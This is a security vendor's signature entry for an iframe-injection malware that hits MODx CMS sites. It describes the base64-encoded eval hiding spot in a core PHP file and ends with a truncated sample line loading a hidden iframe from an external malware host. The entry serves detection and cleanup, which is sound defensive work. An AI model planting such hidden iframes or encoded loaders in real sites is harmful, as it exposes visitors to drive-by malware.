SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwiframetiocp

malware-entry-mwiframetiocp

Description: Javascript encoded to hide an iframe from:
02.tiocp.info

This is used to load malware from external web sites while not being visible to the user.

Affecting: "MODx Content Management System" users.

Clean up: This malware is generally hidden at the manager/includes/document.parser.class.inc.php file (encoded with eval(base64_decode)).

Malware dump (sample of malware):


< iframe src = " http://02.tiocp.info/x/index.php?s=23...